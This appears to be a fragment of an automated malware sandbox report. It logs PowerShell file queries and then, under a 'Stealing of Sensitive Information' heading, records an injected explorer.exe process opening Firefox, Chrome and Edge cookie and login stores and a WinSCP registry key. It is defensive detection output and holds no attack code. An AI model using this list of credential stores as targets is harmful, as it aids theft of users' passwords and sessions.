              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\wihaduvQueries volume information: C:\Users\user\AppData\Roaming\wihaduv VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wihaduvQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02972112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,19_2_02972112
              Source: C:\Windows\explorer.exeCode function: 14_2_02493490 GetUserNameW,14_2_02493490
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02972198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,19_2_02972198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: 13.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\db\data.safe.bin
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\favicons.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\containers.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\xulstore.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\events\background-update
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore-backups\previous.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\webappsstore.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\times.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\session-state.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499497826.a275b456-884f-44cd-99f6-41f5ee4092ba.main.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\saved-telemetry-pings\5bf0a14b-0281-4d70-9b35-ffc28432d5f1
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\addons.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\saved-telemetry-pings\7246f3c2-1d10-4546-a55f-90f67de31b41
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\ls-archive.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\39670ac0-d7c4-4e16-ab34-d16ebbe23b2c
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499493080.5bf0a14b-0281-4d70-9b35-ffc28432d5f1.main.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\protections.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\ExperimentStoreData.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\pkcs11.txt
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499497797.7246f3c2-1d10-4546-a55f-90f67de31b41.health.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\9938bf8b-a4c5-48e9-b997-3ebf2ee8cc32
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\favicons.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\AlternateServices.txt
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\permissions.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499493081.f660d059-6f2e-4e72-b06a-df12c9ef02fc.first-shutdown.jsonlz4
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\content-prefs.sqlite
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\shield-preference-experiments.json
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\search.json.mozlz4
